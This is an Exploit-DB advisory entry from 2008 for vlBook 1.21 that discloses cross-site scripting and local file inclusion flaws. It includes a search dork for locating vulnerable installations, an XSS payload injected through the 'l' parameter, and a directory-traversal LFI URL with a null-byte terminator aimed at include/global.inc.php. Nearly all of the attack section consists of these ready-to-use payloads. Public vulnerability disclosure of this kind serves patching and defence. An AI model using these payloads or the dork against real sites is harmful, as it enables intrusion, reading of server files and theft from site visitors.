Vlbook 1.21 - Cross-Site Scripting / Local File Inclusion
Author: Khashayar Fereidani
type: webapps
platform: php
port:
date_added: 2008-04-30
date_updated: 2016-12-02
verified: 1
codes: OSVDB-44825;CVE-2008-2073;OSVDB-44824;CVE-2008-2072
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comvlbook_1.21.zip
#####################################################################################
#### vlBook 1.21 (ALL VERSION) ####
#### Multiple Remote Vulnerabilities (LFI/XSS) ####
#####################################################################################
# #
#AUTHOR : IRCRASH (Dr.Crash Or Khashayar Fereidani) #
#Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr
#####################################################################################
# #
#Script Download : http://home.vlab.info/vlbook_1.21.zip #
# #
#DORK : "Powered by vlBook 1.21" #
# #
#####################################################################################
# < XSS > #
#XSS Address : http://example/?l=" <script>alert('xss')</script> #
# #
#####################################################################################
# < LFI > #
#LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00 #
# #
#####################################################################################
# Site : Http://IRCRASH.COM #
################################ TNX GOD ############################################
# milw0rm.com [2008-05-01]